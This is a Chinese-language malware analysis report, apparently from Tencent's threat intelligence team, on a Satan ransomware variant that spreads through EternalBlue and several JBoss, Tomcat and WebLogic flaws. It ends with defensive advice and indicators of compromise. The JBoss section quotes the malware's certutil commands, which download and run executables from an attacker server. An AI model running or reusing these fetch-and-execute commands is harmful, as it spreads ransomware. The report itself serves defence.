0x1 概述
撒旦(Satan)勒索病毒在2017年初被外媒进行了曝光,被曝光后,撒旦(Satan)勒索病毒非但没停止攻击的脚步,反而不断的进行优化,跟安全软件做持久性的对抗。腾讯御见威胁情报中心在2018年4月曝光了撒旦(Satan)勒索病毒变种携永恒之蓝卷土归来。
腾讯御见威胁情报中心最新监测发现,撒旦(Satan)勒索病毒的传播方式再度升级,不但继续使用永恒之蓝漏洞攻击,还携带了其他多个漏洞攻击模块,包括JBoss反序列化漏洞(CVE-2017-12149)、JBoss默认配置漏洞(CVE-2010-0738)、Put任意上传文件漏洞、Tomcat web管理后台弱口令爆破、Weblogic WLS 组件漏洞(CVE-2017-10271),使该病毒的感染扩散能力、影响范围得以显著增强。
撒旦(Satan)勒索病毒最新变种的攻击流程
0x2 威胁等级:高危
危害评估:★★★★☆
加密服务器数据库文件,若无备份,将对企业正常业务产生不可逆的破坏。
影响评估:★★★★☆
通过永恒之蓝漏洞攻击工具在局域网内渗透传播,同时利用多个服务器安全漏洞攻击工具去下载Satan病毒的执行模块,使病毒的扩散能力、最终影响范围得以增强。
技术评估:★★★☆☆
及时安装系统补丁即可防御此类攻击。
0x3 影响面
未安装永恒之蓝漏洞补丁的系统,内网存在JBoss反序列化漏洞(CVE-2017-12149)、JBoss默认配置漏洞(CVE-2010-0738)、Put任意上传文件漏洞、Tomcat web管理后台弱口令爆破、Weblogic WLS 组件漏洞(CVE-2017-10271)的服务器会增加内网系统被撒旦(Satan)勒索病毒入侵破坏的风险
0x4 技术分析
从本次捕捉到的最新撒旦(Satan)勒索蠕虫病毒来看,该病毒核心包含扫描、攻击、勒索三个模块。
1、扫描模块
该模块用于寻找目标主机以进行下一步攻击。扫描分为内网扫描和公网扫描:
内网扫描:读取本机网络地址生成C段扫描
公网扫描:通过随机读取内置IP硬编码与内置随机端口组合进行扫描。
内置端口:
内置3900多组IP地址段:
部分IP段:
2、攻击模块
扫描发现目标后,对目标存活的机器进行相同的多个漏洞攻击。
JBoss反序列化漏洞(CVE-2017-12149)
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。
JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中。其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
样本中漏洞攻击模块利用已空开的payload对URL拓展/invoker/readonlyj进行漏洞攻击,payload触发漏洞后会从服务器上下载sts.exe(母体)和setup.exe(撒旦(Satan)勒索部分)。
序列化的payload:
下载命令:
cmd.exe /c certutil.exe -urlcache -split -f http://101.99.84.136/cab/sts.exe c:/sts.exe&cmd.exe /c c:\sts.exe
cmd.exe /c certutil.exe -urlcache -split -f http://101.99.84.136/cab/setup.exe c:/setupst.exe&cmd.exe /c c:\setupst.exe
JBoss默认配置漏洞(CVE-2010-0738)
由于JBoss配置不正确,就会允许攻击者执行各种恶意活动。
由于JMX在通常情况下可以通过8080端口进行远程访问,黑客和恶意用户可以通过JBoss控制台功能中的DeploymentScanner来部署上传自己的WAR文件和JSP shells。
样本中漏洞攻击模块会对URL拓展/jmx-console/HtmlAdaptor进行访问,然后会利用jboss.deployment下载上传no3.war包执行。
War包中的jsp文件实际上也会去服务器继续下载样本:
Put任意上传文件漏洞
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意文件。
样本中漏洞攻击模块会对URL进行Put Clist1.jsp文件,如果成功再去访问jsp执行下载。
Put jsp的内容:
Tomcat web管理后台弱口令爆破
Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。
样本中漏洞攻击模块会对URL拓展manager/html进行访问,如果返回401则开始利用内置字典进行爆破。
Weblogic WLS 组件漏洞(CVE-2017-10271)
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器组件。
漏洞引发的原因是Weblogic“wls-wsat”组件在反序列化操作时使用了Oracle官方的JDK组件中“XMLDecoder”类进行XML反序列化操作引发了代码执行,远程攻击者利用该漏洞通过发送精心构造好的HTTPXML数据包请求,直接在目标服务器执行Java代码或操作系统命令。
样本中漏洞攻击模块会对URL拓展/wls-wsat/CoordinatorPortType进行访问发送payload,这里payload目的也是去服务器下载样本(病毒母体和勒索部分)。
永恒之蓝漏洞
永恒之蓝自从被黑客组织公开后,被WannaCry等多种恶意病毒使用,虽然大多数用户已经修复了此漏洞,但是还有一部分未修复漏洞的用户面临被攻击的危险。
样本中该漏洞攻击模块利用释放的永恒之蓝组件和从服务器上下载的Mimikatz对445端口进行扫描攻击,以便从服务器上下载sts.exe进一步的传播。
3、勒索模块
此次的撒旦(Satan)勒索病毒,跟之前一样,依旧以感染服务器中的数据库文件为主。加密后修改文件后缀为:.Satan
被加密的文件主要是数据库文件和压缩、备份文件,后缀名包括:
.mdf、.ldf、.myd、myi、frm、dbf、.bak、.sql、.rar、.zip、.dmp……
勒索信息提供3种语言:英语,汉语和韩语,根据提示,需要支付0.3个比特币作为赎金,才会对文件进行解密,并且三天内没有支付的话,电脑中的文件将无法解密。
0x5 安全建议
腾讯御见威胁情报中心提醒用户注意以下几点:
1、服务器关闭不必要的端口,方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2、使用腾讯御点(个人用户可使用腾讯电脑管家)的漏洞修复功能,及时修复系统高危漏洞;
3、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
4、推荐企业用户使用腾讯御点(下载地址:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家,拦截可能的病毒攻击。
0x6 IOCs
C2:
http://101.99.84.136/data/token.php?status=ST&code=
http://101.99.84.136/data/token.php?status=BK&code=
http://101.99.84.136/data/token.php?status=DB&code=
URL:
http://101.99.84.136/cab/mmkt32.exe
http://101.99.84.136/cab/mmkt64.exe
http://101.99.84.136/cab/no3.exe
http://101.99.84.136/cab/no4.exe
http://101.99.84.136/cab/sts.exe
http://101.99.84.136/cab/st.exe
http://101.99.84.136/cab/setup.exe
MD5:
1fedee59eb95756282cff2493da93689
c290cd24892905fbcf3cb39929de19a5
58d30af5992e33b351293b23ce97724f
c2e413cf553d253578bf1b5674cfbdc2
0x7 参考文献:
《魔鬼撒旦(Satan)勒索病毒携永恒之蓝卷土重来 主攻数据库》